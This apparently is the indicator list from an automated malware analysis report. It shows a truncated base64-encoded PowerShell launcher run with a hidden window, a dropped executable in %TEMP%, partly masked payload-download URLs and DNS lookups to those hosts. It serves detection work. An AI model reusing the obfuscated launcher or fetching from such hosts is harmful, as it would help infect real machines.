Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...
- %TEMP%\nmdj.exe
- %TEMP%\nmdj.exe
- %TEMP%\nmdj.exe
- http://be###gik.com/wp-includes/e6eT18030/
- http://ao###tunes.com/9gipx/wOOY59/
- http://yo###an.co.uk/hWftFfZpx/uRkkm0115/
- DNS ASK ha####mnhat.mizi.vn
- DNS ASK be###gik.com
- DNS ASK ao###tunes.com
- DNS ASK yo###an.co.uk
- DNS ASK se######nailsfranklin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...' (with hidden window)